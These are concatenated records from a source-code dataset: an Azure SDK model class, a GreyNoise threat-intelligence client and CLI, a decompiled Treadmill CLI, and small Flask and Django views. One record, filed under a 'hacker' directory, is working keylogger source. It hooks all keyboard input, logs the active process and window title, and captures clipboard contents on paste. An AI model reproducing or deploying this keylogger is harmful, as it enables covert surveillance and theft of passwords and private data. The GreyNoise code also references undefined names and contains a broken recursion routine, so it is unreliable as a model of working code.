'properties.mandatoryArtifactsResourceIdsWindows', 'type': '[str]'},\n 'premium_data_disks': {'key': 'properties.premiumDataDisks', 'type': 'str'},\n 'environment_permission': {'key': 'properties.environmentPermission', 'type': 'str'},\n 'announcement': {'key': 'properties.announcement', 'type': 'LabAnnouncementPropertiesFragment'},\n 'support': {'key': 'properties.support', 'type': 'LabSupportPropertiesFragment'},\n 'extended_properties': {'key': 'properties.extendedProperties', 'type': '{str}'},\n }\n\n def __init__(self, *, tags=None, lab_storage_type=None, mandatory_artifacts_resource_ids_linux=None, mandatory_artifacts_resource_ids_windows=None, premium_data_disks=None, environment_permission=None, announcement=None, support=None, extended_properties=None, **kwargs) -> None:\n super(LabFragment, self).__init__(tags=tags, **kwargs)\n self.lab_storage_type = lab_storage_type\n self.mandatory_artifacts_resource_ids_linux = mandatory_artifacts_resource_ids_linux\n self.mandatory_artifacts_resource_ids_windows = mandatory_artifacts_resource_ids_windows\n self.premium_data_disks = premium_data_disks\n self.environment_permission = environment_permission\n self.announcement = announcement\n self.support = support\n self.extended_properties = extended_properties\n","sub_path":"azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/lab_fragment_py3.py","file_name":"lab_fragment_py3.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331271640","text":"import pythoncom\nimport pyHook3\nimport win32clipboard\nfrom ctypes import *\n\nuser32 = windll.user32\nkernel32 = windll.kernel32\npsapi = windll.psapi\ncurrent_window = None\n\ndef get_current_process():\n\n # 获取最上层的窗口句柄\n hwnd = user32.GetForegroundWindow()\n\n # 获取进程ID\n pid = c_ulong(0)\n user32.GetWindowThreadProcessId(hwnd, byref(pid))\n\n # 将进程ID存入变量中\n process_id = \"%id\" % pid.value\n\n # 申请内存\n executable = create_string_buffer(\"\\x00\"*512)\n h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)\n\n psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)\n\n # 读取窗口标题\n windows_title = create_string_buffer(\"\\x00\"*512)\n length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)\n\n # 打印\n print(\"[ PID:%s-%s-%s]\" % (process_id,executable.value,windows_title.value))\n\n # 关闭handles\n kernel32.CloseHandle(hwnd)\n kernel32.CloseHandle(h_process)\n\n\ndef KeyStroke(event):\n global current_window\n\n # 检测目标窗口是否转移(如果转移就监听新窗口)\n if event.WindowName != current_window:\n current_window = event.WindowName\n # 函数调用\n get_current_process()\n\n # 检测击键是否为常规按键(非组合键)\n if event.Ascii > 32 and event.Ascii < 127:\n print(chr(event.Ascii))\n else:\n # 如果发现粘贴事件,就把粘贴板内容记录下来\n if event.Key == \"V\":\n win32clipboard.OpenClipboard()\n pasted_value = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n print(\"[PASTE]-%s\" % (pasted_value))\n else:\n print(\"[%s] % event.Key\")\n return True\n\n# 创建并注册book管理器\nkl = pyHook3.HookManager()\nkl.KeyDown = KeyStroke\n\n# 注册hook并执行\nkl.HookKeyboard()\npythoncom.PumpMessages()","sub_path":"hacker/python/键盘记录器.py","file_name":"键盘记录器.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"140672","text":"#!/usr/bin/env python\n\"\"\"Abstract API over the GreyNoise API.\"\"\"\nimport csv\nimport dict2xml\nimport json\nimport logging\nimport os\nimport re\nimport requests\nimport sys\n\n__author__ = \"GreyNoise Intelligence\"\n__copyright__ = \"Copyright, GreyNoise\"\n__credits__ = [\"GreyNoise Intelligence\"]\n__license__ = \"MIT\"\n__maintainer__ = \"GreyNoise Intelligence\"\n__email__ = \"hello@greynoise.io\"\n__status__ = \"BETA\"\n\nclass RequestFailure(Exception):\n \"\"\"Exception to capture a failed request.\"\"\"\n pass\n\n\nclass InvalidResponse(Exception):\n \"\"\"Exception to capture a failed response parse.\"\"\"\n pass\n\n\ndef valid_date(date):\n \"\"\"Check the input date and ensure it matches the format.\"\"\"\n import datetime\n try:\n datetime.datetime.strptime(date, '%Y-%m-%d')\n except ValueError:\n raise ValueError(\"Incorrect data format, should be YYYY-MM-DD\")\n\n\ndef valid_ip(ip_address, strict=True):\n \"\"\"Check if the IP address is valid.\"\"\"\n import socket\n try:\n socket.inet_aton(ip_address)\n return True\n except socket.error:\n if strict:\n raise ValueError(\"Invalid IP address\")\n return False\n\n\n\nclass GNUtils:\n CONFIG_PATH = os.path.expanduser('~/.config/greynoise')\n CONFIG_FILE = os.path.join(CONFIG_PATH, 'config.json')\n CONFIG_DEFAULTS = {'api_key': ''}\n\n def setup():\n # Called when <-k or --api-key + some argument> used.\n # TODO: key verification using ping endpoint \n # Auto-check at some interval? Configurable?\n # If query is run w/o valid credentials, it will be unsuccessful - speaks for itself\n\n if len(sys.argv) >= 4 and (sys.argv[2] == \"-k\" or sys.argv[2] == \"--api-key\"):\n print(\" Generating config.json...\\n\")\n if not os.path.isfile(GNUtils.CONFIG_FILE):\n if not os.path.exists(GNUtils.CONFIG_PATH):\n os.makedirs(GNUtils.CONFIG_PATH)\n config = GNUtils.CONFIG_DEFAULTS\n config['api_key'] = sys.argv[3] # wip\n with open(GNUtils.CONFIG_FILE, 'w') as file:\n json.dump(config, file, indent=4, separators=(',', ': '))\n # TODO: Test if running this overwrites or appends. It needs to overwrite.\n print(\" Success!\\n ~/.config/greynoise/config.json file generated.\\n\")\n exit()\n else: # If you are w/o the above things, there's a mistake\n print(\" Setup requires an API key.\\n Usage: greynoise setup -k \")\n exit()\n\n\n # Parse json from config file, return api key to caller\n def load_config():\n # test for existence of file again before actually executing\n if os.path.isfile(GNUtils.CONFIG_FILE):\n config = json.load(open(GNUtils.CONFIG_FILE))\n if \"api_key\" in config:\n # print(config['api_key'])\n return config['api_key']#.encode('utf-8')\n else:\n return ''\n print(\" API key not found.\\n\")\n exit()\n\n # Turns input file into a python list\n def listFile(listFile):\n try:\n with open(listFile) as f:\n ipList = []\n inputFile = f.readlines()\n for i in inputFile: \n i = i.split(\"\\n\")[0]\n ipList.append(i)\n return ipList\n except:\n return None\n\n\n\n\nclass GNCli:\n banner = \"\"\"\\n _____________ ______________ \n __ ____/__ | / /_ __ \\__ / \n _ / __ __ |/ /_ / / /_ / \n / /_/ / _ /| / / /_/ /_ /___\n \\____/ /_/ |_/ \\___\\_\\/_____/\n \"\"\"\n\n # Will be loaded\n GREYNOISE_API_KEY = GNUtils.load_config() # this is working\n\n ### global variables ########################################################################\n # For output\n contextFields = { \"ip\": \"IP\", \"classification\": \"Classification\", \"first_seen\": \"First seen\",\n \"last_seen\": \"Last seen\", \"actor\": \"Actor\", \"tags\": \"Tags\" }\n metadataFields = { \"organization\": \"Organization\", \"rdns\": \"rDNS\", \"asn\": \"ASN\", \"tor\": \"Tor\",\n \"os\": \"OS\", \"category\": \"Category\" }\n\n # constraints for inputre.\n flags = [\"-f\", \"--file\", \"-o\", \"--output\", \"-q\", \"--query\", \"-t\", \"--type\", \"-v\", \"--verbose\"]\n flags_meta = [\"-h\", \"--help\"]\n formatTypes = [\"txt\", \"csv\", \"xml\", \"json\", \"raw\"] # constraints for -o\n queryTypes = [\"quick\", \"raw\", \"context\", \"multi\", \"bulk\", \"date\", \"actors\"] # constraints for -t\n\n #############################################################################################\n\n # TODO: formatting.py - make functions, call the right one in each case\n # Could even call a text output handler function in formatting.py right from runQuery\n # that then passes control around amongst smaller functions - the stuff happening in these\n # logic branches could be functions.\n\n\n # TODO: refactor, individual functions? this is long... + name is inaccurate - not all queries are IPs\n def txtIP(results,verboseOut):\n try:\n if \"error\" in results:\n print(\" Error: %s\" % results[\"error\"]) \n # quick scan fields\n elif \"noise\" in results:\n if results[\"noise\"]:\n print(\" %s is classified as NOISE.\" % results[\"ip\"])\n elif not results[\"noise\"]:\n print(\" %s is classified as NOT NOISE.\" % results[\"ip\"])\n # context/gnql fields - called for each result in the list when used with multi-searches\n elif \"seen\" in results or \"count\" in results:\n if results[\"seen\"] or (\"count\" in results and results[\"count\"] > 0):\n print(\" \"*10+\"OVERVIEW:\")\n print(\" \"+\"-\"*28)\n for field in GNCli.contextFields:\n print(\" %s: %s\" % (GNCli.contextFields[field], results[field]))\n print()\n print(\" \"*10+\"METADATA:\")\n print(\" \"+\"-\"*28)\n # Complete location info is not always available, so concatenate whatever info there is.\n if results[\"metadata\"][\"city\"]:\n city = \"%s, \" % results[\"metadata\"][\"city\"]\n else:\n city = \"\"\n if results[\"metadata\"][\"country\"]:\n country = results[\"metadata\"][\"country\"]\n else:\n country = \"Unknown Country\"\n if results[\"metadata\"][\"country_code\"]:\n country_code = \" (%s)\" % results[\"metadata\"][\"country_code\"]\n else:\n country_code = \"\"\n print(\" Location: %s%s%s\" % (city, country, country_code))\n # the rest of the metadata can be looped thru\n for field in GNCli.metadataFields:\n try:\n if results[\"metadata\"][field]:\n if field == \"tor\": # the only non string..\n print(\" Tor: %b\" % results[\"metadata\"][field])\n elif results[\"metadata\"][field]:\n print(\" %s: %s\" % (GNCli.metadataFields[field], results[\"metadata\"][field]))\n except:\n continue\n print()\n print(\" \"*10+\"RAW DATA:\")\n print(\" \"+\"-\"*28)\n if results[\"raw_data\"][\"scan\"]:\n if (len(results[\"raw_data\"][\"scan\"]) < 20) or verboseOut:\n for item in results[\"raw_data\"][\"scan\"]:\n try:\n print(\" Port/Proto: %s/%s\" % (item[\"port\"],item[\"protocol\"]))\n except:\n continue\n else:\n counter = 0\n for item in results[\"raw_data\"][\"scan\"]:\n try:\n print(\" Port/Proto: %s/%s\" % (item[\"port\"],item[\"protocol\"]))\n counter += 1\n if counter == 20:\n break # can make this nicer\n except:\n continue\n print(\" Showing results 1 - 20 of %s. Run again with -v for full output.\" % len(results[\"raw_data\"][\"scan\"]))\n if results[\"raw_data\"][\"web\"]:\n print()\n print(\" [Paths]\")\n if not results[\"raw_data\"][\"web\"][\"paths\"]:\n print(\" None found.\")\n else:\n if (len(results[\"raw_data\"][\"web\"][\"paths\"]) < 20) or verboseOut:\n for path in results[\"raw_data\"][\"web\"][\"paths\"]:\n try:\n print(\" %s\" % path)\n except:\n continue\n else:\n for index in range(20):\n try:\n print (\" %s\" % results[\"raw_data\"][\"web\"][\"paths\"][index])\n except:\n continue\n print(\" Showing results 1 - 20 of %s. Run again with -v for full output.\" % len(results[\"raw_data\"][\"web\"][\"paths\"]))\n if results[\"raw_data\"][\"ja3\"]:\n print(\"[JA3]\")\n if not results[\"raw_data\"][\"ja3\"]:\n print(\"None found.\")\n else:\n for i in results[\"raw_data\"][\"ja3\"]:\n try:\n print(\" Port: %s Fingerprint: %s\"%(i[\"port\"],i[\"fingerprint\"]))\n except:\n continue\n print() \n else:\n print(\"%s has not been seen in scans in the past 30 days.\" % results[\"ip\"])\n except Exception as e:\n print(\"Error converting output!\")\n print(e)\n\n # -o txt\n def makeTxt(results, type, verboseOut):\n try:\n if type == \"bulk\" or type == \"date\":\n formatted = \"\"\n maxcount = 6 # IPs per line - TODO: allow user to set\n count = 0\n # Concatenate IPs into a string of readable columns, variable width\n for ip in results[\"noise_ips\"]:\n if count == 0:\n ip = ' ' + ip # adds spacing to the left of the first IP printed on each line.\n formatted = formatted + (ip+' '*(18-len(ip)))\n count += 1\n if count == maxcount:\n count = 0\n formatted = formatted + \"\\n\"\n # result is paginated\n return pydoc.pager(formatted)\n if type == \"quick\" or type == \"context\":\n GNCli.txtIP(results, verboseOut)\n if type == \"raw\" or not type:\n if \"data\" in results:\n counter = 1\n for entry in results[\"data\"]:\n heading = (\"result %i of %i\" % (counter, len(results[\"data\"])))\n # total number of spaces needed for padding\n spacing = (27 - len(heading))\n # if odd number, extra space should go in front.\n if (27 - len(heading)) % 2 != 0:\n leading_spaces = int((spacing + 1) / 2)\n trailing_spaces = leading_spaces - 1\n heading = \" \"*(leading_spaces) + heading + \" \"*trailing_spaces\n else:\n heading = \" \"*int(spacing/2) + heading + \" \"*int(spacing/2)\n # print title bar for each numbered result (doesnt work well in some environments)\n print((\" ┌───────────────────────────┐\\n │%s│\\n └───────────────────────────┘\") % heading)\n print()\n GNCli.txtIP(entry, verboseOut)\n print()\n print()\n counter+= 1\n else:\n print(\" No results found.\")\n except Exception as e:\n print(\" Error making text output!\")\n print(e)\n\n # TODO: Clean up the lists and flatten within each cell. Handling for other query types? Usage?\n def makeCSV(results, of, type):\n try:\n if type != \"raw\":\n print(\" Output to .csv not available for this query type at this time.\")\n exit()\n else:\n if \"data\" in results:\n scanData = results[\"data\"]\n else:\n print(\" No data to write.\")\n exit()\n scanCSV = open(of, 'w') \n csvwriter = csv.writer(scanCSV)\n count = 0\n for o in scanData:\n if count == 0:\n header = o.keys()\n csvwriter.writerow(header)\n count += 1\n csvwriter.writerow(o.values())\n scanCSV.close()\n print(\" Output to file: %s\" % of)\n except Exception as e:\n print(\" Error converting to CSV!\")\n print(e)\n\n\n ##############################################################################################\n # Making requests\n # TODO: request.py \n\n # TODO: Request handler function that pares some of this insanity down\n\n\n # Handling for single-IP requests. TODO: Name is inaccurate now - not all queries are IPs\n def singleIP(query, type):\n try:\n url = \"https://research.api.greynoise.io/v2/\" \n if type == \"raw\" or not type:\n r = requests.get(url+\"experimental/gnql\", params={\"query\": query}, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n elif type == \"quick\" or type == \"context\":\n url += \"noise/\" + type + \"/\" + rQuery \n r = requests.get(url, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n r2 = json.loads(r.text)\n if \"error\" in r2:\n if r2[\"error\"] == \"invalid ip\": \n print(\" Please enter a valid IP address.\")\n return(False)\n elif r2[\"error\"] == \"commonly spoofed ip\":\n print(\" Provided IP address is commonly spoofed.\")\n return False\n else:\n print(\" Error - %s\" % r2[\"error\"])\n return False \n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request for single IP!\")\n print(e)\n\n\n\n # TODO: handling for file input... invalid/couldnt read, etc\n # TODO: log parser output directly as input for multi query. Come back to this - endpoint busted\n def multiQuery(inputFile):\n try:\n if inputFile:\n ipList = GNUtils.listFile(inputFile)\n rr = {\"ips\": ipList}\n query = json.dumps(rr)\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/multi/quick\",\n data=query, headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n else:\n print(\"Invalid input file.\")\n exit()\n except Exception as e:\n print(\" Error making request!\")\n print(e) \n\n def bulkQuery(date=False):\n try:\n if date: # If there's an actual date given, run the date-specific bulk search\n # Restricts input to \"real\" dates\n matchDateFormat = re.fullmatch('2\\d\\d\\d-((0[1-9])|(1[0-2]))-((0[1-9])|(1[0-9])|(2[0-9])|(3[0-1]))', rQuery)\n if not matchDateFormat:\n print(\"Error: Query needs to be a date in YYYY-MM-DD format.\")\n exit()\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/bulk/\"+rQuery,\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n else: # today\n r = requests.get(\"https://research.api.greynoise.io/v2/noise/bulk\",\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n # enables access to fields\n r2 = json.loads(r.content.decode(\"utf-8\"))\n # If there are no responses, and the end is reached, the log is empty\n if not \"noise_ips\" in r2 and \"complete\" in r2:\n print(\" No IPs found to be generating noise for the given date.\")\n return False\n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request!\")\n print(e)\n\n def actors(): # clarify\n try:\n r = requests.get(\"https://research.api.greynoise.io/v2/research/actors\",\n headers={\"key\": GNCli.GREYNOISE_API_KEY})\n return r.text.encode(\"utf-8\")\n except Exception as e:\n print(\" Error making request!\")\n print(e)\n\n # TODO: write to file with txt formatted output\n def writeToFile(contents):\n if outFile:\n try:\n f = open(outFile, \"w\")\n f.write(str(contents))\n f.close()\n print(\" Output written to file \\\"%s\\\".\" % outFile)\n except:\n print(\" Error accessing output file.\")\n\n \n\n ### Ensure query is valid ~ #################################################################\n def test_query(rQuery,queryType,outFormat):\n\n # If queryType is defined, but its value is not in types, it is not allowed\n if queryType and queryType not in GNCli.queryTypes:\n print(\" Query type unrecognized.\")\n print(\" Accepted query types: quick, raw, context, multi, bulk, date, actors\")\n exit()\n # only these formats\n if outFormat and outFormat not in GNCli.formatTypes:\n print(\" Invalid output format. Options are text, csv, xml, json, raw (default)\")\n exit()\n # If queryType is one of the following, rQuery must be defined - the search requires a query.\n if not rQuery:\n if queryType == \"quick\" or queryType == \"context\" or queryType == \"raw\" or not queryType:\n print(\" Please enter a query.\")\n exit()\n elif queryType == \"date\": #bulkdate\n print(\" Please enter a date (-q YYYY-MM-DD).\")\n exit()\n\n\n\n\n\n ### Main Application Logic #####################################################\n # TODO: refactor? \n def runQuery(outFile,outFormat,queryType,rQuery,verboseOut):\n try:\n \n GNCli.test_query(rQuery,queryType,outFormat) # Will lead to program exit if any issues found.\n\n # TODO: controller for this decision making.\n if rQuery:\n cQuery = re.sub(\"[/]+\", \"\\\\/\", rQuery) # Escaping backslashes\n else:\n cQuery = False\n if queryType == \"context\" or queryType == \"quick\" or queryType == \"raw\" or not queryType:\n result = GNCli.singleIP(cQuery, queryType)\n elif queryType == \"multi\":\n result = GNCli.multiQuery(cQuery) # takes a list of ips\n elif queryType == \"bulk\":\n result = GNCli.bulkQuery() # defaults to today's date\n elif queryType == \"date\":\n result = GNCli.bulkQuery(cQuery) # param is a date YYYY-MM-DD\n elif queryType == \"actors\":\n result = GNCli.actors()\n # you can handle special cases for anything by returning False to runQuery. \n if result:\n jResult = json.loads(result.decode('utf-8'))\n else:\n jResult = False\n\n # TODO: formatting.py as described above - encapsulate the following\n if outFormat == \"xml\":\n if jResult:\n if outFile:\n GNCli.writeToFile(dict2xml.dict2xml(jResult))\n else:\n print(dict2xml.dict2xml(jResult))\n elif outFormat == \"txt\":\n if jResult:\n if queryType != \"quick\":\n print(GNCli.banner)\n GNCli.makeTxt(jResult, queryType, verboseOut)\n elif outFormat == \"csv\":\n if outFile:\n of = outFile\n else: # Timestamped file name generated if none is given\n of = \"greynoise-\" + time.strftime(\"%Y%m%d-%H%M%S\") + \".csv\" \n if jResult:\n GNCli.makeCSV(jResult,of,queryType)\n elif outFormat == \"json\":\n if jResult:\n print(json.dumps(jResult))\n elif not outFormat or outFormat == \"raw\":\n if jResult:\n if outFile:\n GNCli.writeToFile(jResult)\n else:\n print(jResult) # Print raw if nothing specified # TODO: add default\n except Exception as e: \n print(\" General Error! %s\" % e)\n # TODO: error handling for API key\n \n\n\nclass GreyNoise:\n\n \"\"\"Abstract interface for GreyNoise.\"\"\"\n\n NAME = \"GreyNoise\"\n LOG_LEVEL = logging.INFO\n BASE_URL = \"https://enterprise.api.greynoise.io\"\n CLIENT_VERSION = 1\n API_VERSION = \"v2\"\n EP_NOISE_BULK = \"noise/bulk\"\n EP_NOISE_BULK_DATE = \"noise/bulk/{date}\"\n EP_NOISE_QUICK = \"noise/quick/{ip_address}\"\n EP_NOISE_MULTI = \"noise/multi/quick\"\n EP_NOISE_CONTEXT = \"noise/context/{ip_address}\"\n CODE_CONST = {\n '0x00': 'IP has never been observed scanning the Internet',\n '0x01': 'IP has been observed by the GreyNoise sensor network',\n '0x02': 'IP has been observed scanning the GreyNoise sensor network, but has not completed a full connection, meaning this can be spoofed',\n '0x03': 'IP is adjacent to another host that has been directly observed by the GreyNoise sensor network',\n '0x04': 'RESERVED',\n '0x05': 'IP is commonly spoofed in Internet-scan activity',\n '0x06': 'IP has been observed as noise, but this host belongs to a cloud provider where IPs can be cycled frequently',\n '0x07': 'IP is invalid',\n '0x08': 'IP was classified as noise, but has not been observed engaging in Internet-wide scans or attacks in over 60 days'\n }\n\n def __init__(self, api_key):\n \"\"\"Init the object.\"\"\"\n self._log = self._logger()\n self.api_key = api_key\n\n def _logger(self):\n \"\"\"Create a logger to be used between processes.\n\n :returns: Logging instance.\n \"\"\"\n logger = logging.getLogger(self.NAME)\n logger.setLevel(self.LOG_LEVEL)\n shandler = logging.StreamHandler(sys.stdout)\n fmt = '\\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():'\n fmt += '%(lineno)d %(asctime)s\\033[0m| %(message)s'\n shandler.setFormatter(logging.Formatter(fmt))\n logger.addHandler(shandler)\n return logger\n\n def set_log_level(self, level):\n \"\"\"Set the log level.\"\"\"\n if level == 'info':\n level = logging.INFO\n if level == 'debug':\n level = logging.DEBUG\n if level == 'error':\n level = logging.ERROR\n self._log.setLevel(level)\n\n def _request(self, endpoint, params=dict(), data=None):\n \"\"\"Handle the requesting of information from the API.\"\"\"\n GNClient_value = \"pyGreyNoise v%s\" % (str(self.CLIENT_VERSION))\n headers = {'X-Request-Client': 'pyGreyNoise', 'key': self.api_key}\n url = '/'.join([self.BASE_URL, self.API_VERSION, endpoint])\n self._log.debug('Requesting: %s', url)\n response = requests.get(url, headers=headers, timeout=7, params=params,\n data=data)\n if response.status_code not in range(200, 299):\n raise RequestFailure(response.status_code, response.content)\n try:\n loaded = json.loads(response.content)\n except Exception as error:\n raise InvalidResponse(error)\n return loaded\n\n def _recurse(self, config, breaker=False):\n if breaker:\n return results\n kwargs = {'endpoint': config['endpoint'], 'params': config['params']}\n response = self._request(**kwargs)\n if not response['complete']:\n config['results'].append(config['data_key'])\n self._recurse(config, response['complete'])\n\n def get_noise(self, date=None, recurse=True):\n \"\"\"Get a complete dump of noisy IPs associated with Internet scans.\n\n Get all noise IPs generated by Internet scanners, search engines, and\n worms. Users will get all values or can specify a date filter for just\n a single day.\n\n :param date: Optional date to use as a filter.\n :type date: str\n :param recurse: Recurse through all results.\n :type recurse: bool\n :return: List of IP addresses associated with scans.\n :rtype: list\n \"\"\"\n results = dict()\n endpoint = self.EP_NOISE_BULK\n if date:\n _ = valid_date(date)\n endpoint = self.EP_NOISE_BULK_DATE.format(date=date)\n\n if recurse:\n config = {'endpoint': endpoint, 'params': dict(),\n 'results': list(), 'data_key': 'noise_ips'}\n results = self._recurse(config)\n return results\n\n response = self._request(endpoint)\n results['results'] = list(set(response['noise_ips']))\n results['result_count'] = len(results['results'])\n return results\n\n def get_noise_status(self, ip_address):\n \"\"\"Get activity associated with an IP address.\n\n :param ip_address: IP address to use in the look-up.\n :type recurse: str\n :return: Activity metadata for the IP address.\n :rtype: dict\n \"\"\"\n results = dict()\n _ = valid_ip(ip_address)\n endpoint = self.EP_NOISE_QUICK.format(ip_address=ip_address)\n response = self._request(endpoint)\n if response.get('code') not in self.CODE_CONST:\n response['code_message'] = \"Code message unknown: %s\" % (response.get('code'))\n else:\n response['code_message'] = self.CODE_CONST[response.get('code')]\n results['results'] = response\n return results\n\n def get_noise_status_bulk(self, ip_addresses):\n \"\"\"Get activity associated with multiple IP addresses.\n\n :param ip_addresses: IP addresses to use in the look-up.\n :type ip_addresses: list\n :return: Bulk status information for IP addresses.\n :rtype: dict\n \"\"\"\n results = dict()\n if not isinstance(ip_addresses, list):\n raise ValueError(\"`ip_addresses` must be a list\")\n ip_addresses = [x for x in ip_addresses if valid_ip(x, strict=False)]\n data = json.dumps({'ips': ip_addresses})\n response = self._request(self.EP_NOISE_MULTI, params=dict(), data=data)\n for idx, result in enumerate(response):\n if response.get('code') not in self.CODE_CONST:\n response[idx]['code_message'] = \"Code message unknown: %s\" % (response.get('code'))\n else:\n response[idx]['code_message'] = self.CODE_CONST[response.get('code')]\n results['results'] = response\n results['result_count'] = len(results['results'])\n return results\n\n def get_context(self, ip_address):\n \"\"\"Get context associated with an IP address.\n\n :param ip_address: IP address to use in the look-up.\n :type recurse: str\n :return: Context for the IP address.\n :rtype: dict\n \"\"\"\n results = dict()\n _ = valid_ip(ip_address)\n endpoint = self.EP_NOISE_CONTEXT.format(ip_address=ip_address)\n response = self._request(endpoint)\n results['results'] = response\n return results\n","sub_path":"greynoise/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"253066589","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/treadmill/cli/monitor.py\n# Compiled at: 2017-04-03 02:32:49\n# Size of source mod 2**32: 2459 bytes\n\"\"\"Treadmill Application monitor CLI\n\nCreate, delete and manage app monitors.\n\"\"\"\nimport logging, click\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import restclient\n_LOGGER = logging.getLogger(__name__)\n_EXCEPTIONS = []\n_EXCEPTIONS.extend(cli.REST_EXCEPTIONS)\n_ON_EXCEPTIONS = cli.handle_exceptions(_EXCEPTIONS)\n_REST_PATH = '/app-monitor/'\n\ndef init():\n \"\"\"Configures application monitor\"\"\"\n formatter = cli.make_formatter(cli.AppMonitorPrettyFormatter)\n ctx = {}\n\n @click.group()\n @click.option('--cell', required=True, envvar='TREADMILL_CELL', callback=cli.handle_context_opt, expose_value=False)\n @click.option('--api', help='API url to use.', metavar='URL', envvar='TREADMILL_RESTAPI')\n def monitor_group(api):\n \"\"\"Manage Treadmill app monitor configuration\"\"\"\n ctx['api'] = api\n\n @monitor_group.command()\n @click.option('-n', '--count', type=int, help='Instance count')\n @click.argument('name')\n @_ON_EXCEPTIONS\n def configure(count, name):\n \"\"\"Configure application monitor\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n url = _REST_PATH + name\n if count is not None:\n data = {'count': count}\n try:\n _LOGGER.debug('Creating app monitor: %s', name)\n restclient.post(restapi, url, payload=data)\n except restclient.AlreadyExistsError:\n _LOGGER.debug('Updating app monitor: %s', name)\n restclient.put(restapi, url, payload=data)\n\n _LOGGER.debug('Retrieving app monitor: %s', name)\n monitor_entry = restclient.get(restapi, url)\n cli.out(formatter(monitor_entry.json()))\n\n @monitor_group.command(name='list')\n @_ON_EXCEPTIONS\n def _list():\n \"\"\"List configured app monitors\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n response = restclient.get(restapi, _REST_PATH)\n cli.out(formatter(response.json()))\n\n @monitor_group.command()\n @click.argument('name', nargs=1, required=True)\n @_ON_EXCEPTIONS\n def delete(name):\n \"\"\"Delete app monitor\"\"\"\n restapi = context.GLOBAL.cell_api(ctx['api'])\n url = _REST_PATH + name\n restclient.delete(restapi, url)\n\n del delete\n del _list\n del configure\n return monitor_group","sub_path":"pycfiles/Treadmill-0.0.2-py3.4/monitor.cpython-34.py","file_name":"monitor.cpython-34.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"243212709","text":"from app import db\nfrom flask import Response\n\nfrom datetime import datetime\n\nfrom app.models import *\n\nfrom . import populate\n\n@populate.route('/popula')\ndef popula():\n roles = ['Admin', 'Moderator', 'User']\n role_query = Role.query.all()\n\n if str(role_query) == '[]':\n for role in roles:\n populate_role = Role(\n role_name=role\n )\n db.session.add(populate_role)\n \n populate_user = User(\n username='luis.carvalho',\n name='Luis Fernando Carvalho',\n email='luis@admin.com',\n password='admin123',\n role_id=1\n )\n db.session.add(populate_user)\n \n populate_event = Event(\n title='Campeonato para Bronzes',\n description='Campeonato de League of Legends',\n date_event='20/06/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M'),\n )\n db.session.add(populate_event)\n\n populate_event2 = Event(\n title='Campeonato para Ouros',\n description='Campeonato de League of Legends',\n date_event='30/07/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event2)\n\n populate_event3 = Event(\n title='Campeonato para Hackers',\n description='Campeonato de programação voltado para pentest',\n date_event='12/07/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event3)\n\n populate_event4 = Event(\n title='Campeonato para Desenvolvedores Web',\n description='Campeonato voltado para desenvolvedores web com foco em \\\n responsividade e melhor desempenho',\n date_event='20/08/2019',\n created_at=datetime.today().strftime('%d/%m/%Y %H:%M'),\n last_updated=datetime.today().strftime('%H:%M')\n )\n db.session.add(populate_event4)\n db.session.commit()\n\n return \"\"\"\n

Tabelas populadas:

\n

Roles

\n

Users

\n

Events

\n Index \n \"\"\"\n\n else:\n return \"\"\"\n

Base já populada!

\n Index \n \"\"\"","sub_path":"app/populate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297573488","text":"from time import time\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom .forms import DisplayForm\n\n\nclass FibonacciSeries(View):\n\n template_name = 'fibonacci/index.html'\n\n def get(self, request, *args, **kwargs):\n\n form = DisplayForm()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n start_time = time()\n form = DisplayForm(request.POST)\n errors = ''\n current_number = ''\n result = ''\n\n if form.is_valid():\n current_number = form.cleaned_data.get('number')\n if current_number == 1:\n result = 1\n else:\n result = fib(current_number)\n else:\n errors = form.errors\n\n end_time = time() - start_time\n\n template_values = {\n 'errors': errors,\n 'time': end_time,\n 'current_number': current_number,\n 'result': result\n }\n return render(request, self.template_name, template_values)\n\n\ndef fib(n):\n current = 1\n old = 0\n i = 1\n while i < n:\n current, old, i = current + old, current, i+1\n return 